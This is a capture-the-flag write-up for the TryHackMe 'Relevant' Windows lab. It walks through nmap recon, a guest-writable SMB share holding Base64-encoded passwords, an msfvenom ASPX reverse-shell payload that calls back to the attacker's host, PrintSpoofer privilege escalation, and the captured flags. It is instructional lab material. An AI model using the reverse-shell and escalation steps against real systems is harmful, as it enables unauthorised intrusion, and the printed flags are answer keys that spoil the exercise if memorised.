# Relevant
###### tags: `vulnerableMachine`
# Scope of work
- Black-box penetration test
- The client has asked that you secure two flags (no location provided) as proof of exploitation:
  - User.txt
  - Root.txt
---
- Any tools or techniques are permitted in this engagement
- Locate and note all vulnerabilities found
- Find and report ALL vulnerabilities (yes, there is more than one path to root)

Required report format:
- executive summary
- vulnerability
- exploitation assessment
- remediation suggestions
# Recon
```
python3 ../../deepScan.py 10.10.221.83
script is running. Author:meowhecker
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 11:59 CST
Nmap scan report for 10.10.221.83
Host is up (0.28s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-13T04:06:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2023-02-12T03:35:08
|_Not valid after: 2023-08-14T03:35:08
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2023-02-13T04:06:12+00:00
49663/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-02-13T04:06:15
|_ start_date: 2023-02-13T03:35:10
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-02-12T20:06:13-08:00
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 172.27 ms 10.17.0.1
2 ... 4
5 284.40 ms 10.10.221.83
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 451.86 seconds
```
Potentially vulnerable services:
- 80: web (IIS 10.0)
- 445: SMB server
- 49663: a second IIS instance, probably a testing server

Next steps: enumerate the SMB shares and brute-force directories on the web servers.
---
```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.43.201
```
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 14:10 CST
Nmap scan report for 10.10.43.201
Host is up (0.36s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.43.201\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.43.201\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.43.201\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.43.201\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Nmap done: 1 IP address (1 host up) scanned in 136.63 seconds
```
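The finding above that matters most is a share a guest session can write to. As an added example (not part of the original writeup), this Python parser reads nmap's `smb-enum-shares` block and flags shares writable without credentials, which is the check a defender would run over their own scan output; the sample input is a constructed copy of two shares from the output above, with the flattened indentation this page shows.

```python
import re

# Constructed sample: two of the shares from the smb-enum-shares output above,
# embedded so the parser runs offline (indentation flattened as on this page).
SAMPLE = r"""
| smb-enum-shares:
| account_used: guest
| \\10.10.43.201\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.43.201\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
"""

SHARE_RE = re.compile(r"^(\\\\[^:]+):$")  # a share header such as \\host\name:


def parse_smb_enum_shares(text):
    """Return (account_used, {share_path: {field: value}}) from an nmap
    smb-enum-shares block. Only the '|'/'|_' prefix and whitespace are
    stripped, so nmap's indented output and the flattened copy above both parse."""
    account, shares, current = None, {}, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("|_").strip()
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "account_used":
            account = value
        elif current is not None and key:
            shares[current][key] = value
    return account, shares


def writable_without_credentials(text):
    """Paths of shares that a guest/anonymous session can write to: the
    weakness that gives initial access on this box."""
    account, shares = parse_smb_enum_shares(text)
    unauthenticated = account in (None, "guest", "anonymous", "<blank>")
    return sorted(
        path for path, f in shares.items()
        if "WRITE" in f.get("Anonymous access", "")
        or (unauthenticated and "WRITE" in f.get("Current user access", ""))
    )


if __name__ == "__main__":
    print(writable_without_credentials(SAMPLE))
```

Feed it the full `nmap --script smb-enum-shares` report of a host; any path it returns is a share whose ACL should be tightened before anything else on the report.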
SMB login to the writable share as guest:
```
smbclient //10.10.43.201/nt4wrksv
```
The share contains sensitive data: a file named passwords.txt.
```
get passwords.txt
```
```
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```
The entries (e.g. `Qm9iIC0gIVBAJCRXMHJEITEyMw==`) are Base64-encoded, not encrypted. Decoded with https://www.asciitohex.com/:
```
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
```
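As an added example (not the writeup's own tooling), this Python function parses the `[User Passwords - Encoded]` file format found on the share: each non-header line is Base64 of `user - password`. It validates the Base64 strictly and keeps any line that does not fit the format in a separate list instead of silently dropping it; the input is a constructed copy of the file shown above.

```python
import base64
import binascii

# Constructed copy of the passwords.txt pulled from the nt4wrksv share above.
PASSWORDS_TXT = """\
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
"""


def decode_password_file(text):
    """Parse the '[User Passwords - Encoded]' format.

    Returns (creds, bad): creds maps user -> password for every line that is
    valid Base64 of 'user - password'; bad lists lines that are not valid
    Base64, not UTF-8, or lack the ' - ' separator.
    """
    creds, bad = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):  # skip blanks and section headers
            continue
        try:
            plain = base64.b64decode(line, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            bad.append(line)
            continue
        user, sep, password = plain.partition(" - ")
        if sep:
            creds[user] = password
        else:
            bad.append(line)
    return creds, bad


if __name__ == "__main__":
    found, unparsed = decode_password_file(PASSWORDS_TXT)
    for user in found:
        print(f"{user}: credential recovered from Base64 (encoding is not protection)")
    print("unparsed lines:", unparsed)
```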
Directory brute-force against the IIS instance on port 49663 (output excerpt):
```
==> DIRECTORY: http://10.10.43.201:49663/aspnet_client/
--> Testing: http://10.10.43.201:49663/captcha
--> Testing: http://10.10.43.201:49663/carbuyaction
http://10.10.43.201:49663/aspnet_client/
```
## Initial Access

We can infer that the SMB share maps to a directory served by the IIS instance on port 49663, and the brute-force confirms that the directory actually exists.
Now we can attempt to upload a web shell to the share in order to gain initial access.
http://10.10.43.201:49663/aspnet_client/
Based on the URL path (`aspnet_client`), the web application is likely ASP.NET, so an ASPX web shell is the right payload format.
ASPX web shell:
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.11.72 LPORT=443 -f aspx -o webShell.aspx
```

Trigger the web shell by requesting it in the web browser (with a listener waiting on port 443).

## Privilege Escalation
---

It appears the current user has SeImpersonatePrivilege enabled, which means token impersonation could be used to escalate privileges.
Upload the PrintSpoofer executable to the share:
https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0


Executing the exploit
```
PrintSpoofer64.exe -i -c cmd
```

From the resulting SYSTEM shell, start PowerShell to search for the flags:
```
powershell.exe
```
THM{fdk4ka34vk346ksxfr21tg789ktf45}

---

THM{1fk5kf469devly1gl320zafgl345pv}